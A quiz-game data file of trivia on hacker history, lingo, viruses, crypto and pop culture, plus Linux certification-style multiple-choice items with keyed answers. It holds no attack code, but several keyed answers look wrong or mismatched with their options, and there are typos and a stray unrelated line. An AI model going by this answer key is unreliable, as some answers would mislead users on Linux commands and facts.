B#Movie Hackers Q103: "ARF! ARF! GOTCHA", which appears near the end, when the gibson is about to crash is a nod to the:	^A: a Hacking simulation game called GOTCHA	^B: Asoziale Randgruppe Frankfurt	^C: Chaos Computer Club	^D: Cult of the Dead Cow
DNS-attack#History Q48: What kind of attack prevented millions of users from reaching Microsoft Web pages for two days in 2001?
1998#History Q49: The hacking group Cult of the Dead Cow releases its Trojan horse program, Back Orifice--a powerful hacking tool--at Def Con. What year?
The analyzer #History Q50: During heightened tensions in the Persian Gulf, hackers touch off a string of break-ins to unclassified Pentagon computers and steal software programs. Who was their ringleader and even got arrested? 
AOhell#History 1997 Q51: Hundreds of thousands of AOL users find their mailboxes flooded with multi-megabyte mail bombs and their chat rooms disrupted with spam messages. What's the name of the program causing this?
script kiddie#History Q52: An unskilled hacker is also known as a: ____________
7#History Q53: In March 1999 Kevin Mitnick pleaded guilty to ? charges.
10#History Q54 1999: Russian crackers siphon ?? million dollars from Citibank and transfer the money to bank accounts around the world.
Finland and Israel#History Q55 1999: Vladimir Levin, the then 30-year-old ringleader responsible for the Citibank hack, transfers funds to accounts in countries like: _______ and _______
three#History Q56 1999: The Citibank hack: Vladimir Levin stands trial in the United States and is sentenced to how many years in prison?
400.000#History Q57 1999: The Citibank hack: Authorities recover all but ^-------- of the 10 million dollars of stolen money. 
A#History Q56 1994: What was the reason for HOPE, Hackers On Planet Earth, a conference in New York City, to take place?	^A: 2600 Magazine's 10 year anniversary	^B: DeFCoNs, 5 year anniversary	^C: Black Hats first meeting.	^D: A public discussion about hacking was needed.
Fyodor#History Q57: NMAP is a port scanner and OS detection tool. NMAP was written by a hacker known as ??
Nmap#History Q58:  For remote OS detection via TCP/IP Stack FingerPrinting u can use?
Nmap#Movies Q104: What tool does Trinity use in The Matrix reloaded?
A#History Q59: Why did Fyodor pick his handle? 	^A: He had recently read and enjoyed  "Notes from Underground". 	^B: He is a fan of Russian tales and his favorite is Fyodor, a Russian troll.	^C: He loved the 1928 Russian novel The Twelve Chairs 	^D: Fyodor means: Fuck Your OS! Die Or Resist
the pig#History Q60: Snort is also referred to as:
The personal computer#History Q61: What did IBM introduce in 1981?
Legion of Doom#History Q62: 1984 LOD stands for?
Maters of Deception#History Q63: 1984 MOD stands for?
Phiber Optik#History Q64: 1984 Who was tossed out of Legion of Doom and formed with his friends Master of Doom?
cartoon#History Q65: 1984 Lex Luthor named Legion of Doom after a Saturday morning _______?
1990#History Q66: The Great Hacker War, a two year online warfare between LOD and MOD, started in? YYYY
The Federal Computer Fraud and Abuse Act#History Q67: In 1986 a new law passed the American Congress. What's it called?
Robert Morris#History Q68: Who earned, by releasing an Internet worm, the distinction of being the first person convicted under the 1986 computer-crime act in the USA?
backdoor#Lingo Q1: In the security of a system, a hole deliberately left in place by designers or maintainers. May be intended for use by service technicians. syn. trap door
bit bucket#Lingo Q2: The universal data sink. Discarded, lost or destroyed data is said to have gone to the ? 
cracker#Lingo Q3: One who breaks security on a system. Coined by hackers in defense against journalistic misuse of the term "hacker." 
foo#Lingo Q4:Used very generally as a sample name for absolutely anything, esp. programs and files.
hacker#Lingo Q5:A person who enjoys exploring the details of programmable systems and how to stretch their capabilities
cracker#Lingo Q6: A malicious meddler (person) who tries to discover sensitive information by poking around.
Keep It Simple Stupid#Lingo Q7:  KISS means? 
kluge#Lingo Q8: A clever programming trick intended to solve a particularly nasty case in an expedient, if not clear, manner
kluge#Lingo Q9:Something that works for the wrong reason.
lots of MIPS but no I/O#Lingo Q10: Describes a person who is technically brilliant but who can't seem to communicate with human beings effectively
netiquette#Lingo Q11: The conventions of politeness recognized on Usenet, such as avoidance of cross-pointing to inappropriate groups and refraining from commercial pluggery outside the biz groups
Phreaking#Lingo Q12: The art and science of cracking the phone network 
raster burn#Lingo Q13: Eyestrain brought on by too many hours of looking at low-res, poorly tuned or glare-ridden monitors
RTFM#Lingo Q14: Used by gurus to brush off questions they consider trivial or annoying.
RTFM#Lingo Q15: Used when reporting a problem to indicate that you aren't just asking out of randomness: "Yes, I read the ???? first"
security by obscurity#Lingo Q16: A hacker term for vendors' favorite way of coping with security holes  namely, ignoring them
security by obscurity#Lingo Q17: documenting neither any known holes nor the underlying security algorithms; or trusting that nobody will find out about them, and that people who did find about them won't exploit them
sneaker#Lingo Q18: An individual hired to break into places in order to test their security; analogous to "tiger team." 
spaghetti code#Lingo Q19: Code with a complex and tangled control structure, esp. one using many GOTOs, exceptions or other 'unstructured' branching constructs
kangaroo code#Lingo Q20: A piece of lines with many jumps in it.
Time Bomb#Lingo Q21: A subspecies of logic bomb that is triggered by reaching some preset time
Time Bomb#Lingo Q22: Goes off when a malicious programmer is fired or laid off and is not present to perform the appropriate suppressing action periodically
Trojan Horse#Lingo Q23: A malicious, security-breaking program that is disguised as something benign, such as a directory lister, archiver, game or (in one notorious 1990 case on the Mac) a program to find and destroy viruses. 
Vaporware#Lingo Q24: Products announced far in advance of any release
voodoo programming#Lingo Q25: The use by guess or cookbook of an obscure or hairy system, feature or algorithm that one does not truly understand
Vulcan nerve Pinch#Lingo Q26: The keyboard combination that forces a soft-boot or jump to ROM monitor (on machines that support such a feature). On many micros this is Ctrl-Alt-Del; on Suns, L1-A; on some Macintoshes, it is!
Vulcan nerve Pinch#Lingo Q27: Also called the "three-finger salute." 
wedged#Lingo Q28: To be stuck, incapable of proceeding without help.
crashed#Lingo Q29: The system has become totally nonfunctioning.
Wetware#Lingo Q30: Human beings (programmers, operators, administrators) attached to a computer system, as opposed to that system's hardware or software. 
Wizard#Lingo Q31: A person who knows how a complex piece of software or hardware works; esp. someone who can find and fix bugs quickly in an emergency
wizard#Lingo Q32: Someone is a hacker if he or she has general hacking ability, but is a _______ only if he or she has detailed knowledge
Zipperhead#Lingo Q33: A person with a closed mind
^B#Viruses Q1: Kournikova 2001 A light sentence for the author of the virus. Why was that?	^A:It was so obviously a virus.	^B:Many companies were unwilling to admit whether it had affected their systems	^C:The lack of a cybercrime law.	^D:The "JPEG" was a relatively harmless virus easily detected by anti-virus software.
Darksigns#Games Q1: The first advanced console based hacking game
Hack the box#Games Q2: A competition held on events to prove ur skillz
Wardriving#Lingo Q34: The benign act of locating and logging wireless access points while in motion
alldas.de#History Q69: 2001 provided a great defacement mirror.
cadir#Viruses Q2: This worm repeatedly sends itself to the first Bluetooth-enabled device that it can find.
Lexus#Viruses Q3: This car maker has denied that the Cabir wireless worm poses a risk to the Bluetooth-capable navigation systems featured in some of its vehicles.
80 dollars#viruses Q4: 2004 Eugene Suchkov, a member of the 29A virus-writing group, admitted to writing W32/Stepan and MSIL/Gastropod and posting the virus code on various websites. What was his fine when he got convicted?
AnnaKournikova#Viruses Q5:Jan de Wit, aka 'OnTheFly', living in Sneek, was sentenced for his role in the writing and distribution of VBS/VBSWG.J@mm Popularly called: ____________?
Gerrie Mansur#History Q70: The year 2000 scriptkiddie award goes to ________?
Gerrie Mansur#History Q71: 2000 A Dutch hacker named: _________ claims he could have altered Nasdaq.com and three sites run by MarketWatch.com
www.securityfocus.com#History Q72: Home of bugtraq ---.------------.---
B#Viruses Q6: Gigabyte, the virus writer claiming to have written the Sharp virus, breaks the stereotype of virus writers. 	^A: It's a scriptkiddie	^B: She's a woman	^C: It's the first time a spammer works with a virus writer	^D: He was a sysadmin that got fired and took revenge.
Valentine's Day#Viruses Q7: The 19-year-old female virus writer known as Gigabyte got arrested on: _________'_ ___
ReDaTtAcK#History 1999 Q73: hacked into the greatest ISP of belgium and Generale Bank. Got a fine of 15.000^ and 30.000^ claims. Frans Devaere his handle: ___________
^A#Viruses Q8: In the coconut virus, written by Gigabyte, u can throw coconuts at:	^A:Frans Deveare aka RedAttack and  Graham Cluley, Sophos.	^B:Bill Gates and Kevin Schmitz	^C:Jan de Wit, aka Onthefly creator of the kournikova virus	^D:Sven Jaschan creator of Sasser and Netsky.
Paris Hilton#History Q75: 2005 stores in New York are selling out of Sidekicks despite or, more likely, because of that fact that celebrity phone numbers and naughty pictures were stolen off one belonging to bad-girl heiress _________
NetBus#SC stuff Q1: Let's see if u do have at least the knowledge of a scriptkiddie:  On Port 12345 is?
31337#History Q76: Portnumber of scriptkiddies heaven also known as 'Th3 31337 p0rt'
Back Orifice#SC stuff Q1: Let's see if u do have at least the knowledge of a scriptkiddie:  On Port 31337 is? 
Masters Paradise#SC stuff Q3: Let's see if u do have at least the knowledge of a scriptkiddie:  On Port 3128 is? 
Microsoft#History Q77: 2002 This software maker had inadvertently shipped copies of the company's Visual Studio .Net development tool containing the Nimda virus to South Korea.
source code for Whistler#History Q78:2000 Russian hackers planted the QAX Trojan disguised as Notepad in a Microsoft employee's email. What did they probably get hold of?
The Halloween Documents#History Q79:  1998, a confidential Microsoft memorandum on Redmond's strategy against Linux and Open Source software was leaked. These writings are known as: ___ _________ _________
Georgi Guninski#History Q80: 2000 Microsoft has criticised a well-known Bulgarian bug hunter after he publicised details of a security weakness, that was more theoretical than practical, before a patch was available.
The Reservoir Dogs#History Q81:2002 Italy's Guardia di Finanza, or financial police, arrested this group of 14 people, accusing them of thousands of computer intrusions, including attacks on the US Army and Navy and the NASA. 
The Free Software Foundation#History Q82: Richard Stallman is known, not only to be one of the mythical hackers of MIT, the creator of Emacs and GNU, but also as the visionary founder of ___ ___ _________ __________ 
The General Public Licence#History Q83: Richard Stallman is known, not only to be one of the mythical hackers of MIT, the creator of Emacs and GNU, but also as the inventor of ___ _________ ________ _________
GPL#History Q84:Also known as copyleft, a licence that allows people to create and distribute software
B#History Q85:In December 1995 the Tuscan group of Strano Network calls for the first global Netstrike, to protest against	^A:The war in Bosnia	^B: the nuclear experiments at Mururoa	^C: The sinking of Greenpeace's Rainbow Warrior ^D: The assassination of Rabin at peace rally 
FidoNet#History Q86: 1993 the first knots of the European Counter Network (ECN) are born from: 
15203#History Q87: May 2001 Attrition.org closed the mirrored defacement site. How many sites were registered at that moment? 
Cisco Systems#History Q88: 2004 a group of Italian teenagers known as The BlackAngels disclosed a series of security flaws in this company's operating systems for networking devices. 
Gay pron#History Q89: 2004 The Italian Senate has been the subject of a hack attack by cybercriminals who uploaded images of ___ ____ onto screens all around the senate building
Mafiaboy#History Q90: 2000, There was a series of attacks on major commercial Web sites -- Yahoo, Amazon, eBay, Dell.com, CNN.com and more. They all experienced a "denial of service" attack, 67 charges and sentenced to eight months in a youth detention center. Who?
46000#History Q91:2000 Russell Sanford, 18, was sentenced to two years in prison and fined ^_____ for hacking and defacing Web sites of the U.S. Postal Service and the state of Texas.
Wardriving#History Q92: 2004 Brian Salcedo was convicted on hacking charges and sentenced to nine years in jail after hacking into the computer system of a chain of hardware stores after discovering its insecure Wi-Fi network while ________ and stealing credit card information.
FBI#History Q93: 2002 Michael Schuler an ___ agent, was charged with computer hacking by the Russian counterintelligence service
Al-Jazeera#History Q94: 2002 Arab satellite news channel  __-_______ was hacked and  its traffic redirected to a site showing an American flag  and the words "Let Freedom Ring."  
Chaos Computer Club#History Q95: 1997 The ____ _____ ____ demonstrated how an ActiveX control could transfer funds from users' bank accounts without using a personal-identification or transaction number.
CCC#History Q96:1997 In a proof-of-concept this Group ___ showed the German press how to read the information off a German Eurocheque-ATM card using a common, inexpensive magnetic-card reader
statistical analysis#Techno Q1: Cracking a PIN code is not simply a matter of scanning through all the possible number combinations, better is to use: 
The Wily Hackers#History Q97: 1989 ___ ____ ______ have been arrested in Berlin, Hamburg and Hannover, and they are accused of computer espionage for the Soviet KGB. 
D#History Q98: 1989 The Wily Hackers stopped hacking computers through Bremen University computer center, their favorite host for transatlantic hacks. Why?	^A:Karl Koch, due to his luxurious lifestyle and drug addiction, got financial problems	^B:Hans Huebner, alias "Pengo," got arrested and fired.	^C: They learned an investigation was held against them	^D: They asked the police to uncover the reasons for their high telephone bills
Markus Hess#History Q99: 1989 Clifford Stoll's "Wily Hacker" who was often referred to as the Hannover Hacker and uses the alias of Mathias Speer name:_____ ______
Stachel Draht#History Q100: 1999 a distributed denial of service attack tool, based on source code from the "Tribe Flood Network" distributed denial of service attack tool
DDOS Tool#Techno Q2:  a ___ ______ is made up of master (handler) and daemon, or "bcast" (agent) programs
Barb Wire#Techno Q3: Stacheldraht is German for "_____ ______"
Mixter#History Q101: In late August/early September of 1999, focus began to shift from trinoo to TFN, presumed to be the original code by ______?
statd and cmsd and ttdbserverd#Techno Q4: Stacheldraht agents were originally found on a number of Solaris 2.x systems, which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services ____ and _____ and ______
TCP and ICMP#Techno Q5:  Unlike trinoo, which uses UDP, or the original Tribe Flood Network, which uses ICMP for communication between the handler and agents, stacheldraht uses ___ and ___
Fluffy Bunny#History Q102: 2002 Tux the Linux penguin (complete with rabbit ears) masturbating a disproportionately large pink penis - probably mean he is no friend of the open source community, was the logo of: _______ ________
Infosecurity#History Q103: 2003 Fluffy Bunny was arrested by the Metropolitan Police on Tuesday, while attending ________, in London
Laroux#Viruses Q10: 1st known Excel virus
Sapphire/Slammer Worm#Viruses Q11: As it began spreading throughout the Internet, it doubled in size every 8.5 seconds 
random scanning#Viruses Q12: Sapphire's/Slammer worm  spreading strategy is based on _____ _______
Evanescence, My immortal#Music Q1:At the end of this song, u hear a modem softly squeaking:  Band,song
Double Date#Music Q2: Two Dutch females, on the European song contest with the song: An Email to Berlin.
U've got mail#Movies Q1: In this Movie, Meg Ryan fell in love with her neighbour.
Boomtown Rats,i dont like mondays#Music Q3: 'The Silicon Chip inside her head was switched to overload' Band, song 
Kraftwerk,Pocket Calculator#Music Q4: ^  'I am adding and subtracting' ^   'I'm controlling and composing'  ^   Band, song
Kraftwerk,Computer Love#Music Q5: ^   Another lonely night ^   Stare at the TV screen ^   I don't know what to do ^   I need a rendezvous ^  Band, Song
1.3GHZ	#DF Q1: Frequency a US GSM phone operates at
.6 watts	#DF Q2: The maximum power of a mobile analog AMPS or NAMPS phone?
Great Wall of China	#Defense Q1: This defensive structure was built from 300BC through 1300AD
Troy	#Defense Q2: Cassandra warned them, but Odysseus still managed to crack this city's walls.
Berlin Wall	#Defense Q3: Checkpoint Charlie was found at one end of this fortress.
Maginot Line	#Defense Q4: French politician who as minister of war built this impregnable fortification on the border with Germany. (Thought to be impregnable, the line was bypassed and later captured by the Germans in 1940.)
Acropolis	#Defense Q5: This Greek word means High City 
1976	#Crypto Q1: The year in which DES was originally certified as a US crypto standard. 
Twofish	#Crypto Q2: Bruce Schneier's AES submission for a new national standard.
One Time Pad	#Crypto Q3: The only theoretically undefeatable crypto-system?
Deep Crack	#Crypto Q4: DES was cracked with a home brew computer by this name. 
differential cryptanalysis#Crypto Q5: DES was possibly engineered to withstand this cryptanalysis technique that was publicly discovered many years after the algorithm's introduction 
Paul McCartney	#Numbers Q1: This ridiculously famous musician was asked over 3 million questions during an on-line interview, May 17, 1997. He only answered 200.
NEC	#Numbers Q2: This company built the world's first 4 GB chip.
Mars Pathfinder	#5 Q: This website event was the busiest in history. 46 million visitors on July 8, 1997.
Gail Thackery	#Busters Q1: This prosecutor spoke at the same convention as a hacker they were prosecuting.
Jim Cristie	#Busters Q2: If you spent enough time trying to break into Air Force machines, chances are this person knew about you.  Also listed on the back of the "Kuji world tour" tee-shirt.
Bill Murray, Harold Ramis and Dan Ackroyd	#Busters Q3: The three original Ghostbusters' real names
Ivan Orton	#Busters Q4: This Northwest hacker-buster prosecuted Ceribrum and Telop.
Richard Vriesde	#Busters Q5: Projectleader of the Dutch Cybercops at KLPD 2000
echelon	#Spyware Q1: a term associated with a global network of computers that automatically search through millions of intercepted messages for pre-programmed keywords or fax, telex and e-mail addresses.
carnivore	#Spyware Q2: a controversial program developed by the U.S. Federal Bureau of Investigation (FBI) to give the agency access to the online/e-mail activities of suspected criminals.
Top Secret	#Access Q1: IBM mainframe access control security products 
ACF-2	#Access Q2: IBM mainframe access control security products 
Racf	#Access Q3: IBM mainframe access control security products  
MOD	#Groups Q1: This British Military sounding acronym has been used more than once for hacking groups. 
Deception	#Groups Q2:MOD: Masters of: 
Destruction	#Groups Q3:MOD: Masters of: 
Download	#Groups Q4:MOD: Masters of: 
Hacktic	#Groups Q5: This group started an ISP off the proceeds from a famous hacking convention.
Bellcore	#Groups Q6: This famous hacking group was named after a research branch of the phone company they broke into.
France	#Groups Q7: At SummerCon 1995, a private group of hackers with no handles or name wanted to declare war on this country.
8lgm	#Groups Q8: This group released vulnerability advisories until the tri-country raids brought them to a screeching halt
BASIC# Beauty, Allure, Special, Ideal, Charming
Operation Sundevil	#Big Busts Q1: The first of a wave of busts, over 200 people got raided during the late 80's
Cellco 51	#Big Busts Q2: The Secret Service staged this BBS to entrap cell hackers
Steve Jackson Games	#Big Busts Q3: This company was raided by overzealous agents in search of hacker secrets.
Minor Threat	#Big Busts Q4: This person developed a famous phone scanner and was later busted for stealing phone company equipment
Parmaster	#Big Busts Q5: With a pack of diskettes in his left hand, sprinting through a second story window, he yelled in his defense "they'll never take me alive!"
The internet worm	#Famous Hacks Q1: This piece of malevolent code wandered the internet wreaking havoc a decade ago.
ParMaster	#Names Q1: This hacker was the "tymenet space gawd"
Kevin Poulson	#Names Q2: This telco master controlled phone switches to win a radio prize for his girlfriend and himself to vacation in Hawaii.
JOSHUA	#Passwords Q1: This was the password that allowed Matthew Broderick in the movie WarGames to gain access to WOPR?
Trustno1	#Passwords Q2: A: Fox Mulder's password
CPE1704TKS	#Passwords Q3: What is the password to launch missiles in WarGames?
Capture the flag	#Games Q4: A game played at Hacker conventions
Hack in the box	#Games Q5: A game played at Hacker conventions
Mega Root FU	#Games Q6: February 2005 will see the first ever hacking game to take place on the public Internet, sponsored by the security group Ghetto Hackers
Root FU	#Games Q7: smaller Capture the Flag hacking competition called ______ had 8 teams competing at the past three Def Con conventions.
Bruce Schneier	#Names Q3: RSA 2005 Who said: Cyberpunk authors get better groupies
Sweden, Denmark and Finland	#Facts Q1: 2005 Which countries had the highest density of net use for both residential and business punters.
job offer	#Small Busts Q6: 2005 Csaba Richter, a 26-year-old IT consultant, jailed for three years, wanted to expose security failings at Ericsson as a "provocation" that he hoped might lead to a ___ _____
Sven Jaschen	#Viruses Q1: The maker of the Kournikova worm, Jan de Wit, was offered a job by the local town mayor. Another person, the self-confessed creator of the destructive NetSky and Sasser worms, has been hired by German security company Securepoint.
Uppsala	#Busts Q7:2004 Around 800MB of code relating to Cisco IOS 12.3 and 12.3t was nicked. The attack on Cisco has been traced back to _______ University's network
Reuters	#Viruses Q2 2005:This press agency was temporarily forced to shut down its instant messaging service. The culprit - Kelvir-U - is a variant of a worm family that targets MSN and Windows Messenger clients.
Lufthansa	#History Q105: 2001 In an "activist demonstration" against the company's practice of letting police use their planes for forced deportations of asylum seekers, this company suffered a flood of incoming messages to the web server that essentially forced it to shut down.
A#Linux Q1:  On a default Linux system, what file system type does the dump command act upon?	^A: Ext2	^B: UFS	^C: JFS	^D: XFS	^E: ReiserFS
A#Linux Q2:  Your machine has two working NIC's with proper addresses. You want to split your network into two new subnets. What single command will accomplish this?	^A: ifconfig	^B: route	^C: default	^D: netstat	^E: None of the choices
B#Linux Q3:  When starting vi with the file nohup.out, which of the following will enable onscreen numbers?	^A: vi +/set num nohup.out	^B: vi +"se nu" nohup.out	^C: vi /+"set number" nohup.out	^D: vi +":set num" nohup.out	^E: echo "set numb" # vi nohup.out
A,B#Linux Q4:  What command will set a regular user's password to force changing it every 60 days? Choose all that apply.	^A: passwd -x 60 user1	^B: chage -M 60 user1	^C: passwd +x 60 user1	^D: useradd -e 60 user1	^E: usermod -f 60 user1
A,C#Linux Q5:  Which two commands share the same database for retrieving information?	^A: whatis	^B: whereis	^C: apropos	^D: find	^E: man
A#Linux Q6:  What command will show only complete word matches for a search term?	^A: whatis	^B: apropos	^C: locate	^D: find	^E: whereis
A#Linux Q7:  What command is the functional equivalent of the command "man -f search term"?	^A: whatis search term	^B: apropos search term	^C: locate search term	^D: find / -name search term	^E: None of the selections
A,B#Linux Q8:  Where can you specify options that affect the booting of the system?	^A: /etc/lilo.conf	^B: boot= prompt	^C: linux:	^D: init 3	^E: init 5
A#Linux Q9:  Which of the following options will speed up traceroute for distant network queries?	^A: -n	^B: -p	^C: -0	^D: -t	^E: -q
B#Linux Q10:  What file on a system contains a list of hosts that can't connect to the machine's services?	^A: /etc/hosts/denial	^B: /etc/hosts.deny	^C: /etc/host.notallow	^D: /etc/inetd.conf	^E: /etc/hosts.not
A#Linux Q11:  What is the binary conversion of the IP address 192.168.1.10?	^A: 11000000.10101000.00000001.00001010	^B: 01101010.11000100.10101000.00000001	^C: 00000001.00001010.11000000.10101000	^D: 10101000.00000001.00001010.11000000	^E: None of the choices
A#Linux Q12:  Your investigation of a system turns up a file that contains the line below: find /home -iname .rhosts -exec rm -f {} \; What is the purpose of this script?	^A: To enhance system security	^B: To remove all program error dumps	^C: To remove all temporary files in the user's home directories	^D: To reset the configuration for the rsh and rexec utilities
B#Linux Q1: What command would rebuild the ld.so.cache file	^A: ldd	^B: ldconfig	^C: ld.so.cache -rebuild	^D: ld
D:#Linux Q1: Most distributions provide an X11 runlevel. What happens after switching to this runlevel?	^A: X may be started by typing startx.	^B: X is launched with the user's window manager of choice. 	^C: The X server shuts down and the user is given a shell prompt.	^D: The display manager prompts the user for a login name and password.	^E: The user is prevented from using the virtual consoles. 
/etc/passwd#Linux Q2. Which file is responsible for keeping track of all UIDs on the system? (State full path) 
D#Linux Q3. What is the most common type of filesystem found on systems that run only Linux?	^A: NFS	^B: FAT	^C: MINX	^D: EXT2FS	^E: LINUXFS2 
A#Linux Q4. If you use ln to make symbolic link of file1 called file2 then you delete file1, can you access the data contained in file1?	^A: No	^B: YES	^C: It depends on who owns file2 	^D: It depends on the permissions on file1 	^E: It depends on the permissions on file2
B#Linux Q5. Using the df command, you find that while you have plenty of free space on your /home file system, you have very few free inodes. What is probably the cause of this?	^A: Too many hard links are in use on /home.	^B: A user has created many very small files.	^C: fsck hasn't been run on /home in a while	^D: Too many symbolic links are in use on /home. ^E: The disk needs to be synced before running df.
A#Linux Q6. Which command line will mount all available file systems which are listed in /etc/fstab?	^A: mount -a	^B: mount /mnt/*	^C: /etc/fstab	^D: mount	^E: cat /etc/fstab #mount
C#Linux Q7. What command will display some information about the permissions files in the current directory?	^A: ls.	^B: pdir.	^C: ls -l.	^D: permdir.	^E: chmod -l.
A#Linux Q8. Which command would show the number of used and free inodes on each partition on your system?	^A: df -i	^B: df -H	^C: free -b	^D: fsck -i -a	^E: du -a -c /
D#Linux Q9. Which of the following commands could be used to change the permissions of the /home/html/ directory to 0755 and all files and subdirectories contained therein?	^A: chmod 00755 /home/html	^B: chmod 0755 /home/html/*	^C: chown 0755 /home/html -R	^D: chmod 0755 /home/html -R	^E: umask 0705 && chmod 0050 /home/html
C#Linux Q10. What portion of a ext2fs partition is reserved by default for the root user?	^A: none.	^B: 2%.	^C: 5%.	^D: 10%.	^E: 50%.
C#Linux Q11. Which command will give you the total amount of free kilobytes on all disk partitions?	^A: du.	^B: df.	^C: df -k.	^D: du -k.	^E: free -a.
C#Linux Q12. If you set the umask to 022, by default what permissions will your files have?	^A: 0220	^B: 0557	^C: 0644	^D: 0755
D#Linux Q13. You are concerned that core files are taking up excessive space on your /home file system. Which command would you use to remove all files named core that are older than a week?	^A: cd /home rm -r -mtime +7 core	^B: find /home -older +7 -exec rm {core}\	^C: find /home -atime +1 -name core -exec rm {}\	^D: find /home -mtime +7 -name core -exec rm{}\	^E: find /home -mtime +1 -name core -exec rm {}\
fsck#Linux Q14. Which utility would you use to verify the integrity of a file system? (Do not specify path or parameters.)
C#Linux Q15. What type of information is contained in the /etc/fstab file?	^A: Information about the currently mounted files	^B: Information about disks such as cylinders and heads	^C: Information about the various filesystems and mount points	^D: Information about filesystem types such as super block offset	^E: Information about the consistency of each currently mounted filesystem
D#Linux Q16. For most GNU software, the recommended command to read the documentation is ________.	^A: cat	^B: man	^C: help	^D: info	^E: lynx
D#Linux Q17. You need to find all references in your system documentation to the word copy. Which single line will best accomplish this task?	^A: man copy	^B: which copy	^C: locate copy	^D: apropos copy	^E: grep "copy" /usr/man/*
free software foundation #Linux Q18. Which entity is primarily responsible for distributing the various Linux HOWTOs? (Use three Words) 
C#Linux Q19. The main collection of Linux usenet newsgroups are found in which usenet hierarchy?	^A: sys.linux	^B: comp.linux	^C: comp.os.linux	^D: comp.sys.linux	^E: comp.opsys.linux
man crontab#Linux Q20. Assume that on your system, there are man pages for both the command crontab and the configuration file for crontab. What command would you use to access the man page for the crontab configuration file? 
expand#Linux Q21. What command run from the shell converts tabs to spaces?
top#Linux Q22. What command could be used to get a hierarchical view of processes running on the system without requiring you to provide any switches or options?
D#Linux Q23. Which of these commands would report how many total accounts (including special system accounts) there are?	^A: count /etc/passwd	^B: nl /etc/passwd # head	^C: wc --users /etc/passwd	^D: wc --lines /etc/passwd	^E: expand --lines /etc/passwd
B#Linux Q24. What symbol can be placed at the end of a line to indicate that the command continues on the next line?	^A: /	^B: \	^C: ;	^D: #	^E: :
D#Linux Q25. Which command removes all subdirectories in /tmp, regardless of whether they are non-existent or in use?	^A: del /tmp/*	^B: rm -rf /tmp	^C: rm -Ra /tmo/*	^D: rm -rf /tmp/*	^E: delete /tmp/*.*
A#Linux Q26. What command would be used to view the contents of a binary file?	^A: od	^B: vil	^C: view	^D: expand	^E: binview
C#Linux Q27. A particular directory contains some files with names starting with the letter a and ending with the letter v. Assuming this is the working directory, what command would move all of these files, and only these files, to the /tmp directory?	^A: cp a?v /tmp/	^B: mv a-v /tmp/	^C: mv a*v /tmp/	^D: mv a?v /tmp/	^E: mv a..v /tmp/
B#Linux Q28. What would you use an alias for?	^A: To provide faster lookups for commands	^B: To avoid having to type long command lines	^C: So others cannot tell what command you are running	^D: To make a local copy of a file in a directory other than the one it exists in.
A,C,D#Linux Q29. Which of the following statements are true? (Select all that apply)	^A: The default "nice" priority value is 0	^B: "Nice" priority values range from 0 to 20.	^C: Lower "nice" priority values signify greater priority	^D: Only the superuser may assign a process maximum priority	^E: Setting a process's "nice" value to the lowest priority is the same as stopping the process.
D:#Linux Q30. Which line below counts the total number of lines containing the word "reject" in /var/log/maillog?	^A: wc -l reject /var/log/maillog	^B: for "reject" in [maillog (count) +1]	^C: wc -l /var/log/maillog l grep reject	^D: cat /var/log/maillog # grep reject # wc -l	^E: cat /var/log/maillog # grep reject # wc -r
C#Linux Q31. User Sally has lost a file. She saved it a week ago and now cannot remember where it is. She knows it contains the word "turkey" but that's all she can remember. Which command string would help Sally locate her missing file?	^A: ls turkey	^B: find turkey	^C: grep turkey	^D: which turkey	^E: ls l grep turkey
E#Linux Q32. The command kill 9	^A: kills the process whose PID is 9	^B: kills all processes belonging to UID 9	^C: sends SIGKILL to all running processes	^D: sends SIGKILL to the process whose PID is 9	^E: sends SIGTERM to the process whose PID is 9
B,C#Linux Q33. Which of the following commands could be used to see which processes are currently run (chose all that apply)	^A: w	^B: ps	^C: top	^D: proc	^E: lsproc
C:Q34. What utility would you use to remove/display columns from each line of a file?	^A: pwd	^B: col	^C: cut	^D: tail	^E: extract
D#Linux Q35. In the command foo < bar # foobar	^A: the stdout from the command foobar is saved to the file foo	^B: the stdout from the command foo is saved to the foobar	^C: the command foobar receives its stdin from the stderr of foo	^D: the command foobar receives its stdin from the stdout of foo	^E: the command bar receives its stdin from the contents of the file foobar
D#Linux Q36. Assume that the file foobar contains 30 lines. Which command line would you use to display the middle 10 lines of the file?	^A: tail -n 10 -h 10	^B: head -n 10 -s 10	^C: head m 10 foobar # tail -n 10 n lo	^D: head -n 20 foobar # tail -n 10	^E: tail -n 20
A,B#Linux Q37. Which programs will allow you to change the priority of a program already running? (Select all that apply)	^A: top	^B: nice	^C: niceit	^D: renice	^E: chnice 
C#Linux Q38. What will "cd ~foo" do?	^A: It will take you to the ~foo directory	^B: It will create the foo directory and change to it	^C: It will take you to the home directory of user foo	^D: It will change the directory to the system foo directory	^E: it will change to the foo directory off of your home directory
C#Linux Q39. Sally has created a text file for data which uses an asterisk to highlight items of significance. Which command would list the line she marked as significant in her file?	^A: find \* sallysfile	^B: wc -l *	^C: grep -n * sallysfile	^D: search *	^E: grep \* sallysfile
A#Linux Q40. Which ps parameter would you use to display the processes of all other users?	^A: a	^B: b	^C: u	^D: x
D,E#Linux Q41. Which of the following directories would you probably not want to include in your backup (Select all that apply)	^A: /var	^B: /etc	^C: /dev	^D: /tmp	^E: /proc 
B#Linux Q42. Assume you have a script /etc/httpdown that shuts down your web server. For some reason, you want to run this at midnight tonight. What command will do that?	^A: crontab -e	^B: at midnight /etc/httpdown	^C: cron -at "00:00" /etc/httpdown	^D: batch -t "00:00" 
groups#Linux Q43. Which command will tell you which groups you belong to? 
B#Linux Q44. User Bob Wilson (bobw) has just retired. You have been instructed to remove his account and all files under his home directory. What command would execute this task with one command? (include necessary switches and/or parameters.)	^A: kill -9 bobw	^B: userdel -r bobw	^C: rm -Rf /home/bobw	^D: delete bobw -d/home/bobw	^E: rm user &&rmdir ^bobw ^/home/bobw 
B#Linux Q45. In what file do you change default variables for all users?	^A: /etc/bashrc	^B: /etc/profile	^C: ~/.bash_profile	^D: /etc/skel/.bashrc	^E: /etc/skel/.bash_profile
D#Linux Q47. How many cron fields are there for specifying the time to execute a cron job?	^A: 1	^B: 3	^C: 4	^D: 5	^E: 6 
D#Linux Q48. What does the following line from /etc/syslog.conf mean?^1:kern warm.mail.err /dev/tty10 ^2:	^A: The kern, warn, mail and err messages are logged to the /dev/tty10	^B: All messages to /dev/tty10 get logged to the files kern.warn and mail.err	^C: The kernel messages with priority warn and the messages from the mailer system with a priority of err get logged to the console 10	^D: Kernel messages with priority warn and above and the messages from the mailer system with a priority of err and higher are logged to console 10.
